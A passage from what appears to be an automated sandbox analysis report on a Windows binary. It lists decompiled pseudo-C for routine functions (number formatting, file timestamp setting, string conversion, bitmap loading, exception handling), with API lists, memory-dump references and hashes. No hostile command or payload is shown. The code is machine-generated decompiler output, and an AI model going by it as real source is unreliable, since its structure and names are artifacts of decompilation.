							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00D8DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00D8DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xd93fc1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00D8E920(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00D8DAC0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00D8DE00();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00D8DE00();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00D8DE00();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00D98A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00DA0FD0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00D97ECC();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00D97DAB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































              0x00d98749
              0x00d98754
              0x00d9875b
              0x00d9875d
              0x00d9875d
              0x00d9875f
              0x00d98768
              0x00d9876a
              0x00d9876f
              0x00d98775
              0x00d9878b
              0x00d98790
              0x00d98793
              0x00d987a0
              0x00d987a5
              0x00d987f9
              0x00d98801
              0x00d98803
              0x00d98805
              0x00d98808
              0x00d98808
              0x00d98808
              0x00d9880e
              0x00d98816
              0x00d98829
              0x00d9882c
              0x00d9882e
              0x00d98831
              0x00d98832
              0x00d98853
              0x00d98856
              0x00d98856
              0x00d98834
              0x00d98834
              0x00d98836
              0x00d98841
              0x00d98841
              0x00d98843
              0x00d9884a
              0x00d98845
              0x00d98845
              0x00d98845
              0x00d98843
              0x00d98857
              0x00d98859
              0x00d9885a
              0x00d9885d
              0x00d9885f
              0x00d98873
              0x00d98861
              0x00d98861
              0x00d98861
              0x00d98878
              0x00d98878
              0x00d9887d
              0x00d98880
              0x00d9888b
              0x00d9888b
              0x00d9888b
              0x00d9888b
              0x00d9888f
              0x00d98896
              0x00d98897
              0x00d9889a
              0x00d9889d
              0x00d9889d
              0x00d9889f
              0x00000000
              0x00000000
              0x00d988b7
              0x00d988be
              0x00d988c2
              0x00d988c5
              0x00d988c8
              0x00d988ca
              0x00d988ca
              0x00d988ca
              0x00d988cc
              0x00d988cf
              0x00d988d2
              0x00d988d4
              0x00d988dc
              0x00d988e2
              0x00d988e5
              0x00d988e8
              0x00d988e9
              0x00d988ec
              0x00d988ef
              0x00d988ef
              0x00d988f4
              0x00d988f7
              0x00000000
              0x00000000
              0x00d9890f
              0x00d98914
              0x00d98918
              0x00000000
              0x00000000
              0x00d9891c
              0x00d9891c
              0x00d9891f
              0x00d98920
              0x00d98920
              0x00d98922
              0x00d98925
              0x00000000
              0x00000000
              0x00d98927
              0x00d9892a
              0x00d98931
              0x00d98934
              0x00d98937
              0x00d9894d
              0x00d9894d
              0x00d9894d
              0x00d98939
              0x00d98939
              0x00d9893b
              0x00d9893e
              0x00d98949
              0x00d98940
              0x00d98943
              0x00d98943
              0x00d9893e
              0x00000000
              0x00d98937
              0x00d9892c
              0x00d9892c
              0x00d9892e
              0x00d9892e
              0x00d98882
              0x00d98882
              0x00d98885
              0x00d98950
              0x00d98950
              0x00d98952
              0x00d98954
              0x00d98957
              0x00d98958
              0x00d98959
              0x00d9895a
              0x00d98962
              0x00d98962
              0x00d98962
              0x00d98964
              0x00d98967
              0x00d9896a
              0x00d9896c
              0x00d9896c
              0x00d9896e
              0x00d98980
              0x00d98984
              0x00d98987
              0x00d9898e
              0x00d98996
              0x00d98996
              0x00d98999
              0x00d9899b
              0x00d989ac
              0x00d989ac
              0x00d989b0
              0x00d989b0
              0x00d989b3
              0x00d989b5
              0x00d989b8
              0x00000000
              0x00d9899d
              0x00d9899d
              0x00d989a3
              0x00d989a3
              0x00d989a7
              0x00d989ba
              0x00d989ba
              0x00d989be
              0x00d989bf
              0x00d989c1
              0x00d989c3
              0x00d98a04
              0x00d98a04
              0x00d98a06
              0x00d98a13
              0x00d98a13
              0x00d98a15
              0x00d98a17
              0x00d98a18
              0x00d98a19
              0x00d98a20
              0x00d98a23
              0x00d98a25
              0x00d98a25
              0x00d98a26
              0x00d98a28
              0x00d98a2b
              0x00d98a2b
              0x00d98a2d
              0x00d98a2f
              0x00000000
              0x00d98a2f
              0x00d98a08
              0x00d98a0a
              0x00000000
              0x00000000
              0x00d98a0c
              0x00000000
              0x00000000
              0x00d98a0e
              0x00d98a11
              0x00000000
              0x00000000
              0x00000000
              0x00d98a11
              0x00d989ca
              0x00d989d0
              0x00d989d0
              0x00d989d2
              0x00d989d3
              0x00d989d4
              0x00d989d5
              0x00d989dc
              0x00d989df
              0x00d989e1
              0x00d989e2
              0x00d989e4
              0x00d989f1
              0x00d989f1
              0x00d989f3
              0x00d989f5
              0x00d989f6
              0x00d989f7
              0x00d989fe
              0x00d98a01
              0x00d98a03
              0x00d98a03
              0x00000000
              0x00d98a03
              0x00d989e6
              0x00d989e6
              0x00d989e8
              0x00000000
              0x00000000
              0x00d989ea
              0x00000000
              0x00000000
              0x00d989ec
              0x00d989ef
              0x00000000
              0x00000000
              0x00000000
              0x00d989ef
              0x00d989cc
              0x00d989ce
              0x00000000
              0x00000000
              0x00000000
              0x00d989ce
              0x00d9899f
              0x00d989a1
              0x00000000
              0x00000000
              0x00000000
              0x00d989a1
              0x00d9899b
              0x00000000
              0x00d98885
              0x00d98880
              0x00d987a7
              0x00d987a9
              0x00000000
              0x00d987ab
              0x00d987c1
              0x00d987c6
              0x00d987c8
              0x00d987d4
              0x00d987da
              0x00d987db
              0x00d987dd
              0x00d987df
              0x00d987ea
              0x00d987ea
              0x00d987ed
              0x00d987ef
              0x00d987ef
              0x00d987f2
              0x00d987ca
              0x00d987ca
              0x00d987ca
              0x00000000
              0x00d987c8
              0x00d98777
              0x00d98777
              0x00d9877e
              0x00d9877f
              0x00d98781
              0x00d98a33
              0x00d98a37
              0x00d98a3c
              0x00d98a3c
              0x00d98a4b
              0x00d98a4b

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
              • Instruction ID: 1709c92aad6dbc9349cd67681b430832ac623e6b9ee860d9703a30a683226413
              • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
              • Instruction Fuzzy Hash: 5EA15831A04386AFDF25CF58C8817BEBBE5EF12710F28416EE4859B281CA348D41DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79F96, Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E00D79F96(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E00D8D940();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00D79E7F( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E00D7A12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00D8082F(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00D8082F(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00D8082F(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E00D7A12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E00D7B32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













              0x00d79f96
              0x00d79f9b
              0x00d79fa7
              0x00d79fae
              0x00d79fb2
              0x00d79fbf
              0x00d79fbf
              0x00d79fc3
              0x00d79fc3
              0x00d79fcc
              0x00d79fd9
              0x00d79fd9
              0x00d79fdd
              0x00d79fdd
              0x00d79fe6
              0x00d79ff4
              0x00d79ff4
              0x00d79ff8
              0x00d79fff
              0x00d7a004
              0x00d7a00b
              0x00d7a021
              0x00d7a011
              0x00d7a01a
              0x00d7a01a
              0x00d7a03c
              0x00d7a042
              0x00d7a049
              0x00d7a093
              0x00d7a098
              0x00d7a0a1
              0x00d7a0a1
              0x00d7a0ab
              0x00d7a0b4
              0x00d7a0b4
              0x00d7a0be
              0x00d7a0c7
              0x00d7a0c7
              0x00d7a0d7
              0x00d7a0db
              0x00d7a0eb
              0x00d7a0fb
              0x00d7a101
              0x00d7a108
              0x00d7a110
              0x00d7a11d
              0x00d7a11d
              0x00000000
              0x00d7a04b
              0x00d7a05c
              0x00d7a063
              0x00d7a122
              0x00d7a12c
              0x00d7a12c
              0x00d7a080
              0x00d7a086
              0x00d7a08d
              0x00000000
              0x00000000
              0x00000000
              0x00d7a08d
              0x00d7a049
              0x00d79fee
              0x00d79ff2
              0x00000000
              0x00000000
              0x00000000
              0x00d79ff2
              0x00d79fd3
              0x00d79fd7
              0x00000000
              0x00000000
              0x00000000
              0x00d79fd7
              0x00d79fb9
              0x00d79fbd
              0x00000000
              0x00000000
              0x00000000

              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D77F2C,?,?,?), ref: 00D7A03C
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D77F2C,?,?), ref: 00D7A080
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D77F2C,?,?,?,?,?,?,?,?), ref: 00D7A101
              • CloseHandle.KERNEL32(?,?,00000000,?,00D77F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7A108
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              • API String ID: 2287278272-0
              • Opcode ID: 594cc8566be2ce925684adb18de79ef27220f3593fa2639dd6cf80bf6d8d12c6
              • Instruction ID: 297fa61081afb9a3cdaf3d572d45c0ad9854d36f1a6e72343b3e74e872bfc567
              • Opcode Fuzzy Hash: 594cc8566be2ce925684adb18de79ef27220f3593fa2639dd6cf80bf6d8d12c6
              • Instruction Fuzzy Hash: D641AE312483819AE721EB28DC55BAEBBE99F85300F084919F5D9D31C1E664DA48DB73
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9B5EA, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E00D9B5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t34 ^ _t70;
				E00D93356(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x31e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00D8E203(_t67, _v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00D8E920(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00D9980D(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00D97A8A(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00DA0EE0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















              0x00d9b5f2
              0x00d9b5f9
              0x00d9b605
              0x00d9b60a
              0x00d9b60f
              0x00d9b614
              0x00d9b614
              0x00d9b617
              0x00d9b619
              0x00d9b619
              0x00d9b61e
              0x00d9b637
              0x00d9b63d
              0x00d9b642
              0x00d9b6e1
              0x00d9b6e5
              0x00d9b6ea
              0x00d9b6ea
              0x00d9b706
              0x00d9b706
              0x00d9b648
              0x00d9b650
              0x00d9b654
              0x00d9b6a0
              0x00d9b6a2
              0x00d9b6a4
              0x00d9b6a9
              0x00d9b6c0
              0x00d9b6c8
              0x00d9b6d8
              0x00d9b6d8
              0x00d9b6c8
              0x00d9b6da
              0x00d9b6db
              0x00000000
              0x00d9b6e0
              0x00d9b65b
              0x00d9b65d
              0x00d9b65f
              0x00d9b667
              0x00d9b684
              0x00d9b68e
              0x00d9b693
              0x00000000
              0x00000000
              0x00d9b695
              0x00d9b69b
              0x00d9b69b
              0x00000000
              0x00d9b69b
              0x00d9b66b
              0x00d9b66f
              0x00d9b674
              0x00d9b678
              0x00000000
              0x00000000
              0x00d9b67a
              0x00000000

              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,31E85006,00D934E6,00000000,00000000,00D9451B,?,00D9451B,?,00000001,00D934E6,31E85006,00000001,00D9451B,00D9451B), ref: 00D9B637
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D9B6C0
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D9B6D2
              • __freea.LIBCMT ref: 00D9B6DB
                • Part of subcall function 00D97A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D92FA6,?,0000015D,?,?,?,?,00D94482,000000FF,00000000,?,?), ref: 00D97ABC
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: 6721de90c85cd1f81212a81e506569201f176ec8e9b9439da6170d7bfdb22c73
              • Instruction ID: adf4214d47117747b01fa271181f9994fd59f068964884060163fe2a4a0ddf03
              • Opcode Fuzzy Hash: 6721de90c85cd1f81212a81e506569201f176ec8e9b9439da6170d7bfdb22c73
              • Instruction Fuzzy Hash: 1731C172A0020AABDF249F65DD45EAE7BA9EF40720F094129FC14DB290E735ED50CBB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8A4F8, Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8A4F8(void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0xdb0060, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E00D8963A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E00D8952A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E00D8963A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E00D8958C(_v20);
					_t13 = E00D8975D(_t21, _t32, _t22, E00D89549(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}














              0x00d8a4f8
              0x00d8a4f8
              0x00d8a50e
              0x00d8a512
              0x00d8a515
              0x00d8a517
              0x00d8a520
              0x00d8a520
              0x00d8a529
              0x00d8a536
              0x00d8a541
              0x00d8a54a
              0x00d8a54e
              0x00d8a551
              0x00d8a553
              0x00d8a553
              0x00d8a54e
              0x00d8a558
              0x00d8a568
              0x00d8a570
              0x00d8a572
              0x00d8a574
              0x00d8a57c

              APIs
              • LoadBitmapW.USER32(00000065), ref: 00D8A508
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00D8A529
              • DeleteObject.GDI32(00000000), ref: 00D8A551
              • DeleteObject.GDI32(00000000), ref: 00D8A570
                • Part of subcall function 00D8963A: FindResourceW.KERNEL32(00000066,PNG,?,?,00D8A54A,00000066), ref: 00D8964B
                • Part of subcall function 00D8963A: SizeofResource.KERNEL32(00000000,76B95B70,?,?,00D8A54A,00000066), ref: 00D89663
                • Part of subcall function 00D8963A: LoadResource.KERNEL32(00000000,?,?,00D8A54A,00000066), ref: 00D89676
                • Part of subcall function 00D8963A: LockResource.KERNEL32(00000000,?,?,00D8A54A,00000066), ref: 00D89681
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID:
              • API String ID: 142272564-0
              • Opcode ID: 19edd88e88961880a26c6a684a3e5354087a379ef24ba76c7b0944698bcaab92
              • Instruction ID: c0e7247a08cb1a7ac89fc8c7c0a7b510b36327b7b02aa01a4c6a6dc216bd2fb7
              • Opcode Fuzzy Hash: 19edd88e88961880a26c6a684a3e5354087a379ef24ba76c7b0944698bcaab92
              • Instruction Fuzzy Hash: DC01F2325402052BD71233688C56E7FB76EDF86B61F0C01A1BA40F7291EE118D0253B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D91A89, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
              Download Yara Rule
              C-Code - Quality: 20%
              			E00D91A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00D920D8(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00D8F1DB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00D922DA(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00D91893(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00D8F1A9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












              0x00d91a89
              0x00d91a89
              0x00d91a8c
              0x00d91a91
              0x00d91a94
              0x00d91a96
              0x00d91a99
              0x00d91a9c
              0x00d91a9d
              0x00d91aa0
              0x00d91aa5
              0x00d91aa5
              0x00d91aa8
              0x00d91aac
              0x00d91aaf
              0x00d91ab4
              0x00d91ab1
              0x00d91ab1
              0x00d91ab1
              0x00d91ab7
              0x00d91abd
              0x00d91ac0
              0x00d91ac2
              0x00d91ac5
              0x00d91ac8
              0x00d91ac9
              0x00d91ad2
              0x00d91ad7
              0x00d91ada
              0x00d91ae0
              0x00d91ae3
              0x00d91ae6
              0x00d91ae9
              0x00d91aea
              0x00d91aed
              0x00d91af8
              0x00d91afc
              0x00000000
              0x00d91afc
              0x00d91b03

              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 00D91AA0
                • Part of subcall function 00D920D8: ___AdjustPointer.LIBCMT ref: 00D92122
              • _UnwindNestedFrames.LIBCMT ref: 00D91AB7
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00D91AC9
              • CallCatchBlock.LIBVCRUNTIME ref: 00D91AED
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
